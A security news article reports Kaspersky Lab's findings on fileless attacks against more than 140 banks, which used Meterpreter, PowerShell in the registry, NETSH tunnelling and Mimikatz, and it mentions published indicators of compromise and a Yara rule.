Kaspersky Lab researchers have brought to light a series of attacks leveraged against 140+ banks and other businesses around the world.
But what makes these attacks unusual is the criminals’ use of widely used legitimate tools and fileless malware, which explains why the attacks went largely unnoticed.
“This threat was originally discovered by a bank’s security team, after detecting Meterpreter code inside the physical memory of a domain controller (DC),” the researchers explained.
“Kaspersky Lab participated in the forensic analysis after this attack was detected, discovering the use of PowerShell scripts within the Windows registry. Additionally it was discovered that the NETSH utility as used for tunnelling traffic from the victim’s host to the attacker´s C2.”
Meterpreter is a well known Metasploit payload that allows attackers to control the screen of a device using VNC and to browse, upload and download files. NETSH (network shell), is a Windows command-line utility that allows local or remote configuration of network devices.
The attackers also took advantage of the Windows SC utility to install a malicious service to execute PowerShell scripts, and Mimikatz to extract credentials from compromised machines.
“The use of the SC and NETSH utilities requires administrator privileges both in local and remote host. The use of malicious PowerShell scripts also requires privilege escalation and execution policy changes,” the researchers noted.
“In order to achieve this, attackers used credentials from Service accounts with administrative privileges (for example backup, service for remote task scheduler, etc.) grabbed by Mimikatz.”
The attackers’ goal
The attacks on banks were apparently aimed at compromising computers that control ATMs, so the attackers could steal money.
But the use of the Metasploit framework, standard Windows utilities and previously unknown domains that have no WHOIS information makes it difficult to tie these attacks to one or more groups.
Also, it is still unknown how the initial infection is performed.
What to do?
The researchers are scheduled to reveal more details about the attacks in April.
In the meantime, they have published Indicators of Compromise (IoCs) and a Yara rule that can be used by banks and organizations to detect these fileless PowerShell attacks on their networks.
“After successful disinfection and cleaning, it is necessary to change all passwords,” they concluded.